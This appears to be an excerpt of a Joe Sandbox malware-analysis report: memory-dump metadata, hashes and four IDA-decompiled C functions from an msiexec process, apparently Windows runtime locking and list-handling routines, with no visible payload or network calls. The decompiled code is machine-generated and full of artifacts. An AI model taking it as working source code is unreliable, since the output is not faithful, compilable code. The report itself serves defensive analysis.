                              • Associated: 0000000B.00000002.941394667.0000000004DFF000.00000040.00000800.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_4ce0000_msiexec.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 6b6289253c085e2db05a74a652c07397146b8ab366f6504e8a2ce54b54ddc457
                              • Instruction ID: 61353d80c889f7cc0cd422f2ca23dc58552f7a2bf8d27d156972ec9d5636fc13
                              • Opcode Fuzzy Hash: 6b6289253c085e2db05a74a652c07397146b8ab366f6504e8a2ce54b54ddc457
                              • Instruction Fuzzy Hash: 51518E76F001258BCB24DF18C8909BDB7B1FB8870271584DAE8969B328E734FE51DB91
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 04DCAE44 Relevance: .2, Instructions: 152COMMON
                              Download Yara Rule
                              C-Code - Quality: 86%
                              			E04DCAE44(signed char __ecx, signed int __edx, signed int _a4, signed char _a8, signed int* _a12) {
				signed int _v8;
				signed int _v12;
				void* __esi;
				void* __ebp;
				signed short* _t36;
				signed int _t41;
				char* _t42;
				intOrPtr _t43;
				signed int _t47;
				void* _t52;
				signed int _t57;
				intOrPtr _t61;
				signed char _t62;
				signed int _t72;
				signed char _t85;
				signed int _t88;

				_t73 = __edx;
				_push(__ecx);
				_t85 = __ecx;
				_v8 = __edx;
				_t61 =  *((intOrPtr*)(__ecx + 0x28));
				_t57 = _a4 |  *(__ecx + 0xc) & 0x11000001;
				if(_t61 != 0 && _t61 ==  *((intOrPtr*)( *[fs:0x18] + 0x24))) {
					_t57 = _t57 | 0x00000001;
				}
				_t88 = 0;
				_t36 = 0;
				_t96 = _a12;
				if(_a12 == 0) {
					_t62 = _a8;
					__eflags = _t62;
					if(__eflags == 0) {
						goto L12;
					}
					_t52 = E04DCC38B(_t85, _t73, _t57, 0);
					_t62 = _a8;
					 *_t62 = _t52;
					_t36 = 0;
					goto L11;
				} else {
					_t36 = E04DCACFD(_t85, _t73, _t96, _t57, _a8);
					if(0 == 0 || 0 == 0xffffffff) {
						_t72 = _t88;
					} else {
						_t72 =  *0x00000000 & 0x0000ffff;
					}
					 *_a12 = _t72;
					_t62 = _a8;
					L11:
					_t73 = _v8;
					L12:
					if((_t57 & 0x01000000) != 0 ||  *((intOrPtr*)(_t85 + 0x20)) == _t88) {
						L19:
						if(( *(_t85 + 0xc) & 0x10000000) == 0) {
							L22:
							_t74 = _v8;
							__eflags = _v8;
							if(__eflags != 0) {
								L25:
								__eflags = _t88 - 2;
								if(_t88 != 2) {
									__eflags = _t85 + 0x44 + (_t88 << 6);
									_t88 = E04DCFDE2(_t85 + 0x44 + (_t88 << 6), _t74, _t57);
									goto L34;
								}
								L26:
								_t59 = _v8;
								E04DCEA55(_t85, _v8, _t57);
								asm("sbb esi, esi");
								_t88 =  ~_t88;
								_t41 = E04D27D50();
								__eflags = _t41;
								if(_t41 == 0) {
									_t42 = 0x7ffe0380;
								} else {
									_t42 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
								}
								__eflags =  *_t42;
								if( *_t42 != 0) {
									_t43 =  *[fs:0x30];
									__eflags =  *(_t43 + 0x240) & 0x00000001;
									if(( *(_t43 + 0x240) & 0x00000001) != 0) {
										__eflags = _t88;
										if(_t88 != 0) {
											E04DC1608(_t85, _t59, 3);
										}
									}
								}
								goto L34;
							}
							_push(_t62);
							_t47 = E04DD1536(0x4df8ae4, (_t74 -  *0x4df8b04 >> 0x14) + (_t74 -  *0x4df8b04 >> 0x14), _t88, __eflags);
							__eflags = _t47;
							if(_t47 == 0) {
								goto L26;
							}
							_t74 = _v12;
							_t27 = _t47 - 1; // -1
							_t88 = _t27;
							goto L25;
						}
						_t62 = _t85;
						if(L04DCC323(_t62, _v8, _t57) != 0xffffffff) {
							goto L22;
						}
						_push(_t62);
						_push(_t88);
						E04DCA80D(_t85, 9, _v8, _t88);
						goto L34;
					} else {
						_t101 = _t36;
						if(_t36 != 0) {
							L16:
							if(_t36 == 0xffffffff) {
								goto L19;
							}
							_t62 =  *((intOrPtr*)(_t36 + 2));
							if((_t62 & 0x0000000f) == 0) {
								goto L19;
							}
							_t62 = _t62 & 0xf;
							if(E04DACB1E(_t62, _t85, _v8, 3, _t36 + 8) < 0) {
								L34:
								return _t88;
							}
							goto L19;
						}
						_t62 = _t85;
						_t36 = E04DCACFD(_t62, _t73, _t101, _t57, _t62);
						if(_t36 == 0) {
							goto L19;
						}
						goto L16;
					}
				}
			}



















                              0x04dcae44
                              0x04dcae4c
                              0x04dcae53
                              0x04dcae55
                              0x04dcae5c
                              0x04dcae64
                              0x04dcae68
                              0x04dcae75
                              0x04dcae75
                              0x04dcae78
                              0x04dcae7a
                              0x04dcae7c
                              0x04dcae7f
                              0x04dcaea8
                              0x04dcaeab
                              0x04dcaead
                              0x00000000
                              0x00000000
                              0x04dcaeb3
                              0x04dcaeb8
                              0x04dcaebb
                              0x04dcaebd
                              0x00000000
                              0x04dcae81
                              0x04dcae88
                              0x04dcae8f
                              0x04dcae9b
                              0x04dcae96
                              0x04dcae96
                              0x04dcae96
                              0x04dcaea0
                              0x04dcaea3
                              0x04dcaebf
                              0x04dcaebf
                              0x04dcaec3
                              0x04dcaec9
                              0x04dcaf0d
                              0x04dcaf14
                              0x04dcaf3d
                              0x04dcaf3d
                              0x04dcaf41
                              0x04dcaf44
                              0x04dcaf67
                              0x04dcaf67
                              0x04dcaf6a
                              0x04dcafca
                              0x04dcafd1
                              0x00000000
                              0x04dcafd1
                              0x04dcaf6c
                              0x04dcaf6d
                              0x04dcaf75
                              0x04dcaf7c
                              0x04dcaf7e
                              0x04dcaf80
                              0x04dcaf85
                              0x04dcaf87
                              0x04dcaf99
                              0x04dcaf89
                              0x04dcaf92
                              0x04dcaf92
                              0x04dcaf9e
                              0x04dcafa1
                              0x04dcafa3
                              0x04dcafa9
                              0x04dcafb0
                              0x04dcafb2
                              0x04dcafb4
                              0x04dcafbc
                              0x04dcafbc
                              0x04dcafb4
                              0x04dcafb0
                              0x00000000
                              0x04dcafa1
                              0x04dcaf4f
                              0x04dcaf57
                              0x04dcaf5c
                              0x04dcaf5e
                              0x00000000
                              0x00000000
                              0x04dcaf60
                              0x04dcaf64
                              0x04dcaf64
                              0x00000000
                              0x04dcaf64
                              0x04dcaf1a
                              0x04dcaf25
                              0x00000000
                              0x00000000
                              0x04dcaf27
                              0x04dcaf28
                              0x04dcaf33
                              0x00000000
                              0x04dcaed0
                              0x04dcaed0
                              0x04dcaed2
                              0x04dcaee1
                              0x04dcaee4
                              0x00000000
                              0x00000000
                              0x04dcaee6
                              0x04dcaeec
                              0x00000000
                              0x00000000
                              0x04dcaefb
                              0x04dcaf07
                              0x04dcafd3
                              0x04dcafdb
                              0x04dcafdb
                              0x00000000
                              0x04dcaf07
                              0x04dcaed6
                              0x04dcaed8
                              0x04dcaedf
                              0x00000000
                              0x00000000
                              0x00000000
                              0x04dcaedf
                              0x04dcaec9

                              Memory Dump Source
                              • Source File: 0000000B.00000002.941198488.0000000004CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: true
                              • Associated: 0000000B.00000002.941382853.0000000004DFB000.00000040.00000800.00020000.00000000.sdmpDownload File
                              • Associated: 0000000B.00000002.941394667.0000000004DFF000.00000040.00000800.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_4ce0000_msiexec.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: cf638e05798cdeee3e79d1a0d44271cfc89df6a55c1a0b55ea663fd29bf52dae
                              • Instruction ID: d20f4711b9082ffa91b9406ef46b0c219d691265d34b8cca3edb33c00a96f963
                              • Opcode Fuzzy Hash: cf638e05798cdeee3e79d1a0d44271cfc89df6a55c1a0b55ea663fd29bf52dae
                              • Instruction Fuzzy Hash: 6941C1B170061B9BDB269F29C894B7BB79AFF84724F04421EF85687390DB74F801D6A1
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 04D2DBE9 Relevance: .1, Instructions: 149COMMON
                              Download Yara Rule
                              C-Code - Quality: 86%
                              			E04D2DBE9(intOrPtr __ecx, intOrPtr __edx, signed int* _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v5;
				signed int _v12;
				signed int* _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				void* __ebx;
				void* __edi;
				signed int _t54;
				char* _t58;
				signed int _t66;
				intOrPtr _t67;
				intOrPtr _t68;
				intOrPtr _t72;
				intOrPtr _t73;
				signed int* _t75;
				intOrPtr _t79;
				intOrPtr _t80;
				char _t82;
				signed int _t83;
				signed int _t84;
				signed int _t88;
				signed int _t89;
				intOrPtr _t90;
				intOrPtr _t92;
				signed int _t97;
				intOrPtr _t98;
				intOrPtr* _t99;
				signed int* _t101;
				signed int* _t102;
				intOrPtr* _t103;
				intOrPtr _t105;
				signed int _t106;
				void* _t118;

				_t92 = __edx;
				_t75 = _a4;
				_t98 = __ecx;
				_v44 = __edx;
				_t106 = _t75[1];
				_v40 = __ecx;
				if(_t106 < 0 || _t106 <= 0 &&  *_t75 < 0) {
					_t82 = 0;
				} else {
					_t82 = 1;
				}
				_v5 = _t82;
				_t6 = _t98 + 0xc8; // 0xc9
				_t101 = _t6;
				 *((intOrPtr*)(_t98 + 0xd4)) = _a12;
				_v16 = _t92 + ((0 | _t82 != 0x00000000) - 0x00000001 & 0x00000048) + 8;
				 *((intOrPtr*)(_t98 + 0xd8)) = _a8;
				if(_t82 != 0) {
					 *(_t98 + 0xde) =  *(_t98 + 0xde) | 0x00000002;
					_t83 =  *_t75;
					_t54 = _t75[1];
					 *_t101 = _t83;
					_t84 = _t83 | _t54;
					_t101[1] = _t54;
					if(_t84 == 0) {
						_t101[1] = _t101[1] & _t84;
						 *_t101 = 1;
					}
					goto L19;
				} else {
					if(_t101 == 0) {
						E04D0CC50(E04D04510(0xc000000d));
						_t88 =  *_t101;
						_t97 = _t101[1];
						L15:
						_v12 = _t88;
						_t66 = _t88 -  *_t75;
						_t89 = _t97;
						asm("sbb ecx, [ebx+0x4]");
						_t118 = _t89 - _t97;
						if(_t118 <= 0 && (_t118 < 0 || _t66 < _v12)) {
							_t66 = _t66 | 0xffffffff;
							_t89 = 0x7fffffff;
						}
						 *_t101 = _t66;
						_t101[1] = _t89;
						L19:
						if(E04D27D50() != 0) {
							_t58 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
						} else {
							_t58 = 0x7ffe0386;
						}
						_t102 = _v16;
						if( *_t58 != 0) {
							_t58 = E04DD8ED6(_t102, _t98);
						}
						_t76 = _v44;
						E04D22280(_t58, _v44);
						E04D2DD82(_v44, _t102, _t98);
						E04D2B944(_t102, _v5);
						return E04D1FFB0(_t76, _t98, _t76);
					}
					_t99 = 0x7ffe03b0;
					do {
						_t103 = 0x7ffe0010;
						do {
							_t67 =  *0x4df8628; // 0x0
							_v28 = _t67;
							_t68 =  *0x4df862c; // 0x0
							_v32 = _t68;
							_v24 =  *((intOrPtr*)(_t99 + 4));
							_v20 =  *_t99;
							while(1) {
								_t97 =  *0x7ffe000c;
								_t90 =  *0x7FFE0008;
								if(_t97 ==  *_t103) {
									goto L10;
								}
								asm("pause");
							}
							L10:
							_t79 = _v24;
							_t99 = 0x7ffe03b0;
							_v12 =  *0x7ffe03b0;
							_t72 =  *0x7FFE03B4;
							_t103 = 0x7ffe0010;
							_v36 = _t72;
						} while (_v20 != _v12 || _t79 != _t72);
						_t73 =  *0x4df8628; // 0x0
						_t105 = _v28;
						_t80 =  *0x4df862c; // 0x0
					} while (_t105 != _t73 || _v32 != _t80);
					_t98 = _v40;
					asm("sbb edx, [ebp-0x20]");
					_t88 = _t90 - _v12 - _t105;
					_t75 = _a4;
					asm("sbb edx, eax");
					_t31 = _t98 + 0xc8; // 0x4dcfb53
					_t101 = _t31;
					 *_t101 = _t88;
					_t101[1] = _t97;
					goto L15;
				}
			}









































                              0x04d2dbe9
                              0x04d2dbf2
                              0x04d2dbf7
                              0x04d2dbf9
                              0x04d2dbfc
                              0x04d2dc00
                              0x04d2dc03
                              0x04d2dc14
                              0x04d2dd54
                              0x04d2dd54
                              0x04d2dd54
                              0x04d2dc18
                              0x04d2dc1d
                              0x04d2dc1d
                              0x04d2dc32
                              0x04d2dc3b
                              0x04d2dc3e
                              0x04d2dc46
                              0x04d2dd5b
                              0x04d2dd62
                              0x04d2dd64
                              0x04d2dd67
                              0x04d2dd69
                              0x04d2dd6b
                              0x04d2dd6e
                              0x04d2dd70
                              0x04d2dd73
                              0x04d2dd73
                              0x00000000
                              0x04d2dc4c
                              0x04d2dc4e
                              0x04d73ae3
                              0x04d73ae8
                              0x04d73aea
                              0x04d2dce7
                              0x04d2dce9
                              0x04d2dcec
                              0x04d2dcee
                              0x04d2dcf0
                              0x04d2dcf3
                              0x04d2dcf5
                              0x04d73af2
                              0x04d73af5
                              0x04d73af5
                              0x04d2dd06
                              0x04d2dd08
                              0x04d2dd0b
                              0x04d2dd12
                              0x04d73b08
                              0x04d2dd18
                              0x04d2dd18
                              0x04d2dd18
                              0x04d2dd20
                              0x04d2dd23
                              0x04d73b16
                              0x04d73b16
                              0x04d2dd29
                              0x04d2dd2d
                              0x04d2dd36
                              0x04d2dd40
                              0x04d2dd51
                              0x04d2dd51
                              0x04d2dc54
                              0x04d2dc59
                              0x04d2dc59
                              0x04d2dc5e
                              0x04d2dc5e
                              0x04d2dc63
                              0x04d2dc66
                              0x04d2dc6b
                              0x04d2dc78
                              0x04d2dc7b
                              0x04d2dc81
                              0x04d2dc81
                              0x04d2dc83
                              0x04d2dc89
                              0x00000000
                              0x00000000
                              0x04d2dd7b
                              0x04d2dd7b
                              0x04d2dc8f
                              0x04d2dc8f
                              0x04d2dc92
                              0x04d2dc99
                              0x04d2dc9f
                              0x04d2dca5
                              0x04d2dcaa
                              0x04d2dcaa
                              0x04d2dcb3
                              0x04d2dcb8
                              0x04d2dcbb
                              0x04d2dcc1
                              0x04d2dccf
                              0x04d2dcd2
                              0x04d2dcd5
                              0x04d2dcd7
                              0x04d2dcda
                              0x04d2dcdc
                              0x04d2dcdc
                              0x04d2dce2
                              0x04d2dce4
                              0x00000000
                              0x04d2dce4

                              Memory Dump Source
                              • Source File: 0000000B.00000002.941198488.0000000004CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: true
                              • Associated: 0000000B.00000002.941382853.0000000004DFB000.00000040.00000800.00020000.00000000.sdmpDownload File
                              • Associated: 0000000B.00000002.941394667.0000000004DFF000.00000040.00000800.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_4ce0000_msiexec.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 3f387024ff2d8976cfb958bf192daaab297f43555890558344eb6bcc43252747
                              • Instruction ID: b168101358863209ad81c19dadd68e019785532fa97e4c5488516c8becd52988
                              • Opcode Fuzzy Hash: 3f387024ff2d8976cfb958bf192daaab297f43555890558344eb6bcc43252747
                              • Instruction Fuzzy Hash: 38518B71A00625DFCB14DF68C690AAEFBF2FB58318F20855AD955A7340EB70F944CBA0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 04D1EF40 Relevance: .1, Instructions: 147COMMON
                              Download Yara Rule
                              C-Code - Quality: 96%
                              			E04D1EF40(intOrPtr __ecx) {
				char _v5;
				char _v6;
				char _v7;
				char _v8;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t58;
				char _t59;
				signed char _t69;
				void* _t73;
				signed int _t74;
				char _t79;
				signed char _t81;
				signed int _t85;
				signed int _t87;
				intOrPtr _t90;
				signed char* _t91;
				void* _t92;
				signed int _t94;
				void* _t96;

				_t90 = __ecx;
				_v16 = __ecx;
				if(( *(__ecx + 0x14) & 0x04000000) != 0) {
					_t58 =  *((intOrPtr*)(__ecx));
					if(_t58 != 0xffffffff &&  *((intOrPtr*)(_t58 + 8)) == 0) {
						E04D09080(_t73, __ecx, __ecx, _t92);
					}
				}
				_t74 = 0;
				_t96 =  *0x7ffe036a - 1;
				_v12 = 0;
				_v7 = 0;
				if(_t96 > 0) {
					_t74 =  *(_t90 + 0x14) & 0x00ffffff;
					_v12 = _t74;
					_v7 = _t96 != 0;
				}
				_t79 = 0;
				_v8 = 0;
				_v5 = 0;
				while(1) {
					L4:
					_t59 = 1;
					L5:
					while(1) {
						if(_t59 == 0) {
							L12:
							_t21 = _t90 + 4; // 0x770bc21e
							_t87 =  *_t21;
							_v6 = 0;
							if(_t79 != 0) {
								if((_t87 & 0x00000002) != 0) {
									goto L19;
								}
								if((_t87 & 0x00000001) != 0) {
									_v6 = 1;
									_t74 = _t87 ^ 0x00000003;
								} else {
									_t51 = _t87 - 2; // -2
									_t74 = _t51;
								}
								goto L15;
							} else {
								if((_t87 & 0x00000001) != 0) {
									_v6 = 1;
									_t74 = _t87 ^ 0x00000001;
								} else {
									_t26 = _t87 - 4; // -4
									_t74 = _t26;
									if((_t74 & 0x00000002) == 0) {
										_t74 = _t74 - 2;
									}
								}
								L15:
								if(_t74 == _t87) {
									L19:
									E04D02D8A(_t74, _t90, _t87, _t90);
									_t74 = _v12;
									_v8 = 1;
									if(_v7 != 0 && _t74 > 0x64) {
										_t74 = _t74 - 1;
										_v12 = _t74;
									}
									_t79 = _v5;
									goto L4;
								}
								asm("lock cmpxchg [esi], ecx");
								if(_t87 != _t87) {
									_t74 = _v12;
									_t59 = 0;
									_t79 = _v5;
									continue;
								}
								if(_v6 != 0) {
									_t74 = _v12;
									L25:
									if(_v7 != 0) {
										if(_t74 < 0x7d0) {
											if(_v8 == 0) {
												_t74 = _t74 + 1;
											}
										}
										_t38 = _t90 + 0x14; // 0x0
										_t39 = _t90 + 0x14; // 0x0
										_t85 = ( *_t38 ^ _t74) & 0x00ffffff ^  *_t39;
										if( *((intOrPtr*)( *[fs:0x30] + 0x64)) == 1) {
											_t85 = _t85 & 0xff000000;
										}
										 *(_t90 + 0x14) = _t85;
									}
									 *((intOrPtr*)(_t90 + 0xc)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
									 *((intOrPtr*)(_t90 + 8)) = 1;
									return 0;
								}
								_v5 = 1;
								_t87 = _t74;
								goto L19;
							}
						}
						_t94 = _t74;
						_v20 = 1 + (0 | _t79 != 0x00000000) * 2;
						if(_t74 == 0) {
							goto L12;
						} else {
							_t91 = _t90 + 4;
							goto L8;
							L9:
							while((_t81 & 0x00000001) != 0) {
								_t69 = _t81;
								asm("lock cmpxchg [edi], edx");
								if(_t69 != _t81) {
									_t81 = _t69;
									continue;
								}
								_t90 = _v16;
								goto L25;
							}
							asm("pause");
							_t94 = _t94 - 1;
							if(_t94 != 0) {
								L8:
								_t81 =  *_t91;
								goto L9;
							} else {
								_t90 = _v16;
								_t79 = _v5;
								goto L12;
							}
						}
					}
				}
			}




























                              0x04d1ef4b
                              0x04d1ef4d
                              0x04d1ef57
                              0x04d1f0bd
                              0x04d1f0c2
                              0x04d1f0d2
                              0x04d1f0d2
                              0x04d1f0c2
                              0x04d1ef5d
                              0x04d1ef5f
                              0x04d1ef67
                              0x04d1ef6a
                              0x04d1ef6d
                              0x04d1ef74
                              0x04d1ef7f
                              0x04d1ef82
                              0x04d1ef82
                              0x04d1ef86
                              0x04d1ef88
                              0x04d1ef8c
                              0x04d1ef8f
                              0x04d1ef8f
                              0x04d1ef8f
                              0x00000000
                              0x04d1ef91
                              0x04d1ef93
                              0x04d1efc4
                              0x04d1efc4
                              0x04d1efc4
                              0x04d1efca
                              0x04d1efd0
                              0x04d1f0a6
                              0x00000000
                              0x00000000
                              0x04d1f0af
                              0x04d6bb06
                              0x04d6bb0a
                              0x04d1f0b5
                              0x04d1f0b5
                              0x04d1f0b5
                              0x04d1f0b5
                              0x00000000
                              0x04d1efd6
                              0x04d1efd9
                              0x04d1f0de
                              0x04d1f0e2
                              0x04d1efdf
                              0x04d1efdf
                              0x04d1efdf
                              0x04d1efe5
                              0x04d6bafc
                              0x04d6bafc
                              0x04d1efe5
                              0x04d1efeb
                              0x04d1efed
                              0x04d1f00f
                              0x04d1f011
                              0x04d1f01a
                              0x04d1f01d
                              0x04d1f021
                              0x04d1f028
                              0x04d1f029
                              0x04d1f029
                              0x04d1f02c
                              0x00000000
                              0x04d1f02c
                              0x04d1eff3
                              0x04d1eff9
                              0x04d1f0ea
                              0x04d1f0ed
                              0x04d1f0ef
                              0x00000000
                              0x04d1f0ef
                              0x04d1f003
                              0x04d6bb12
                              0x04d1f045
                              0x04d1f049
                              0x04d1f051
                              0x04d1f09e
                              0x04d1f0a0
                              0x04d1f0a0
                              0x04d1f09e
                              0x04d1f053
                              0x04d1f064
                              0x04d1f064
                              0x04d1f06b
                              0x04d6bb1a
                              0x04d6bb1a
                              0x04d1f071
                              0x04d1f071
                              0x04d1f07d
                              0x04d1f082
                              0x04d1f08f
                              0x04d1f08f
                              0x04d1f009
                              0x04d1f00d
                              0x00000000
                              0x04d1f00d
                              0x04d1efd0
                              0x04d1ef97
                              0x04d1efa5
                              0x04d1efaa
                              0x00000000
                              0x04d1efac
                              0x04d1efac
                              0x04d1efac
                              0x00000000
                              0x04d1efb2
                              0x04d1f036
                              0x04d1f03a
                              0x04d1f040
                              0x04d1f090
                              0x00000000
                              0x04d1f092
                              0x04d1f042
                              0x00000000
                              0x04d1f042
                              0x04d1efb7
                              0x04d1efb9
                              0x04d1efbc
                              0x04d1efb0
                              0x04d1efb0
                              0x00000000
                              0x04d1efbe
                              0x04d1efbe
                              0x04d1efc1
                              0x00000000
                              0x04d1efc1
                              0x04d1efbc
                              0x04d1efaa
                              0x04d1ef91

                              Memory Dump Source
                              • Source File: 0000000B.00000002.941198488.0000000004CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: true
                              • Associated: 0000000B.00000002.941382853.0000000004DFB000.00000040.00000800.00020000.00000000.sdmpDownload File
                              • Associated: 0000000B.00000002.941394667.0000000004DFF000.00000040.00000800.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_4ce0000_msiexec.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: fbecc144452e6e9740e37df579310400ca1de53fcc592e2907188de4c37816b0
                              • Instruction ID: dd612bb6ed581db3b5abc4636981604fa7d56e6c23598aa853ab2cc951648081
                              • Opcode Fuzzy Hash: fbecc144452e6e9740e37df579310400ca1de53fcc592e2907188de4c37816b0
                              • Instruction Fuzzy Hash: 0E51C130B04249AFDB24CF68E0907AEBBB1BF05314F1881AEDD85972A1D375B989D791
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 04DD740D Relevance: .1, Instructions: 141COMMON
                              Download Yara Rule
                              C-Code - Quality: 84%
                              			E04DD740D(intOrPtr __ecx, signed short* __edx, intOrPtr _a4) {
				signed short* _v8;
				intOrPtr _v12;
				intOrPtr _t55;
				void* _t56;
				intOrPtr* _t66;
				intOrPtr* _t69;
				void* _t74;
				intOrPtr* _t78;
				intOrPtr* _t81;
				intOrPtr* _t82;
				intOrPtr _t83;
				signed short* _t84;
				intOrPtr _t85;
				signed int _t87;
				intOrPtr* _t90;
				intOrPtr* _t93;
				intOrPtr* _t94;
				void* _t98;

				_t84 = __edx;
				_t80 = __ecx;
				_push(__ecx);
				_push(__ecx);
				_t55 = __ecx;
				_v8 = __edx;
				_t87 =  *__edx & 0x0000ffff;
				_v12 = __ecx;
				_t3 = _t55 + 0x154; // 0x154
				_t93 = _t3;
				_t78 =  *_t93;
				_t4 = _t87 + 2; // 0x2
				_t56 = _t4;
				while(_t78 != _t93) {
					if( *((intOrPtr*)(_t78 + 0x14)) != _t56) {
						L4:
						_t78 =  *_t78;
						continue;
					} else {
						_t7 = _t78 + 0x18; // 0x18
						if(E04D5D4F0(_t7, _t84[2], _t87) == _t87) {
							_t40 = _t78 + 0xc; // 0xc
							_t94 = _t40;
							_t90 =  *_t94;
							while(_t90 != _t94) {
								_t41 = _t90 + 8; // 0x8
								_t74 = E04D4F380(_a4, _t41, 0x10);
								_t98 = _t98 + 0xc;
								if(_t74 != 0) {
									_t90 =  *_t90;
									continue;
								}
								goto L12;
							}
							_t82 = L04D24620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x18);
							if(_t82 != 0) {
								_t46 = _t78 + 0xc; // 0xc
								_t69 = _t46;
								asm("movsd");
								asm("movsd");
								asm("movsd");
								asm("movsd");
								_t85 =  *_t69;
								if( *((intOrPtr*)(_t85 + 4)) != _t69) {
									L20:
									_t82 = 3;
									asm("int 0x29");
								}
								 *((intOrPtr*)(_t82 + 4)) = _t69;
								 *_t82 = _t85;
								 *((intOrPtr*)(_t85 + 4)) = _t82;
								 *_t69 = _t82;
								 *(_t78 + 8) =  *(_t78 + 8) + 1;
								 *(_v12 + 0xdc) =  *(_v12 + 0xdc) | 0x00000010;
								goto L11;
							} else {
								L18:
								_push(0xe);
								_pop(0);
							}
						} else {
							_t84 = _v8;
							_t9 = _t87 + 2; // 0x2
							_t56 = _t9;
							goto L4;
						}
					}
					L12:
					return 0;
				}
				_t10 = _t87 + 0x1a; // 0x1a
				_t78 = L04D24620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t10);
				if(_t78 == 0) {
					goto L18;
				} else {
					_t12 = _t87 + 2; // 0x2
					 *((intOrPtr*)(_t78 + 0x14)) = _t12;
					_t16 = _t78 + 0x18; // 0x18
					E04D4F3E0(_t16, _v8[2], _t87);
					 *((short*)(_t78 + _t87 + 0x18)) = 0;
					_t19 = _t78 + 0xc; // 0xc
					_t66 = _t19;
					 *((intOrPtr*)(_t66 + 4)) = _t66;
					 *_t66 = _t66;
					 *(_t78 + 8) =  *(_t78 + 8) & 0x00000000;
					_t81 = L04D24620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x18);
					if(_t81 == 0) {
						goto L18;
					} else {
						_t26 = _t78 + 0xc; // 0xc
						_t69 = _t26;
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						_t85 =  *_t69;
						if( *((intOrPtr*)(_t85 + 4)) != _t69) {
							goto L20;
						} else {
							 *((intOrPtr*)(_t81 + 4)) = _t69;
							 *_t81 = _t85;
							 *((intOrPtr*)(_t85 + 4)) = _t81;
							 *_t69 = _t81;
							_t83 = _v12;
							 *(_t78 + 8) = 1;
							 *(_t83 + 0xdc) =  *(_t83 + 0xdc) | 0x00000010;
							_t34 = _t83 + 0x154; // 0x1ba
							_t69 = _t34;
							_t85 =  *_t69;
							if( *((intOrPtr*)(_t85 + 4)) != _t69) {
								goto L20;
							} else {
								 *_t78 = _t85;
								 *((intOrPtr*)(_t78 + 4)) = _t69;
								 *((intOrPtr*)(_t85 + 4)) = _t78;
								 *_t69 = _t78;
								 *(_t83 + 0xdc) =  *(_t83 + 0xdc) | 0x00000010;
							}
						}
						goto L11;
					}
				}
				goto L12;
			}





















                              0x04dd740d
                              0x04dd740d
                              0x04dd7412
                              0x04dd7413
                              0x04dd7416
                              0x04dd7418
                              0x04dd741c
                              0x04dd741f
                              0x04dd7422
                              0x04dd7422
                              0x04dd7428
                              0x04dd742a
                              0x04dd742a
                              0x04dd7451
                              0x04dd7432
                              0x04dd744f
                              0x04dd744f
                              0x00000000
                              0x04dd7434
                              0x04dd7438
                              0x04dd7443
                              0x04dd7517
                              0x04dd7517
                              0x04dd751a
                              0x04dd7535
                              0x04dd7520
                              0x04dd7527
                              0x04dd752c
                              0x04dd7531
                              0x04dd7533
                              0x00000000
                              0x04dd7533
                              0x00000000
                              0x04dd7531
                              0x04dd754b
                              0x04dd754f
                              0x04dd755c
                              0x04dd755c
                              0x04dd755f
                              0x04dd7560
                              0x04dd7561
                              0x04dd7562
                              0x04dd7563
                              0x04dd7568
                              0x04dd756a
                              0x04dd756c
                              0x04dd756d
                              0x04dd756d
                              0x04dd756f
                              0x04dd7572
                              0x04dd7574
                              0x04dd7577
                              0x04dd757c
                              0x04dd757f
                              0x00000000
                              0x04dd7551
                              0x04dd7551
                              0x04dd7551
                              0x04dd7553
                              0x04dd7553
                              0x04dd7449
                              0x04dd7449
                              0x04dd744c
                              0x04dd744c
                              0x00000000
                              0x04dd744c
                              0x04dd7443
                              0x04dd750e
                              0x04dd7514
                              0x04dd7514
                              0x04dd7455
                              0x04dd7469
                              0x04dd746d
                              0x00000000
                              0x04dd7473
                              0x04dd7473
                              0x04dd7476
                              0x04dd7480
                              0x04dd7484
                              0x04dd748e
                              0x04dd7493
                              0x04dd7493
                              0x04dd7496
                              0x04dd7499
                              0x04dd74a1
                              0x04dd74b1
                              0x04dd74b5
                              0x00000000
                              0x04dd74bb
                              0x04dd74c1
                              0x04dd74c1
                              0x04dd74c4
                              0x04dd74c5
                              0x04dd74c6
                              0x04dd74c7
                              0x04dd74c8
                              0x04dd74cd
                              0x00000000
                              0x04dd74d3
                              0x04dd74d3
                              0x04dd74d6
                              0x04dd74d8
                              0x04dd74db
                              0x04dd74dd
                              0x04dd74e0
                              0x04dd74e7
                              0x04dd74ee
                              0x04dd74ee
                              0x04dd74f4
                              0x04dd74f9
                              0x00000000
                              0x04dd74fb
                              0x04dd74fb
                              0x04dd74fd
                              0x04dd7500
                              0x04dd7503
                              0x04dd7505
                              0x04dd7505
                              0x04dd74f9
                              0x00000000
                              0x04dd74cd
